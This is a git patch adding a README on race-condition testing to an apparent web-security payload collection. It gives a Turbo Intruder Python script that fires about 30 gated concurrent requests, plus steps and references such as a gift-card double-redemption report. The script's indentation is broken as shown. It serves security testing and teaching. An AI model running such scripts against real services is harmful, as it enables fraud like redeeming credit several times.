From 323a012488b96da1d5b40a4fbea4dd5c8a71155c Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 26 Jan 2020 12:43:59 +0100
Subject: [PATCH] Race Condition - First Draft

---
 Race Condition/README.md | 49 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 49 insertions(+)
 create mode 100644 Race Condition/README.md

diff --git a/Race Condition/README.md b/Race Condition/README.md
new file mode 100644
index 0000000..2e70df8
--- /dev/null
+++ b/Race Condition/README.md	
@@ -0,0 +1,49 @@
+# Race Condition
+
+> Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be handled by the framework, server, or programming language. 
+
+## Summary
+
+* [Tools](#tools)
+* [Turbo Intruder Examples](#turbo-intruder-examples)
+* [References](#references)
+
+## Tools
+
+* [Turbo Intruder - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.](https://github.com/PortSwigger/turbo-intruder)
+
+## Turbo Intruder Examples
+
+1. Send request to turbo intruder
+2. Use this python code as a payload of the turbo intruder
+    ```python
+    def queueRequests(target, wordlists):
+        engine = RequestEngine(endpoint=target.endpoint,
+                            concurrentConnections=30,
+                            requestsPerConnection=30,
+                            pipeline=False
+                            )
+
+    for i in range(30):
+        engine.queue(target.req, i)
+            engine.queue(target.req, target.baseInput, gate='race1')
+
+
+        engine.start(timeout=5)
+    engine.openGate('race1')
+
+        engine.complete(timeout=60)
+
+
+    def handleResponse(req, interesting):
+        table.add(req)
+    ```
+3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder
+4. Click "Attack"
+
+
+## References
+
+* [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247)
+* [Turbo Intruder: Embracing the billion-request attack - James Kettle | 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack)
+* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e)
\ No newline at end of file